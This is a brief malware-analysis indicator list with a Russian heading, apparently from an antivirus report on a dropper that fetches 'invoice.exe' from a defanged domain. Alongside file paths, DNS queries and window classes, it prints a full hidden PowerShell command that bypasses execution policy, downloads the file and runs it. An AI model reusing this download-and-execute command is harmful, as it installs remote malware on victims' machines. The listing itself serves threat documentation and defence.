Техническая информация
- http://ko##were.in/invoice.exe как %appdata%\kunla
- %TEMP%\abctfhghgdghgh‹.sct
- %APPDATA%\kunla
- 'ko##were.in':80
- DNS ASK ko##were.in
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'
- ClassName: 'AdobeAcrobat' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://ko##were.in/invoice.exe','%APPDATA%\kunla');Start-Process '%APPDATA%\k...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %APPDATA%\kunla
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\kunla"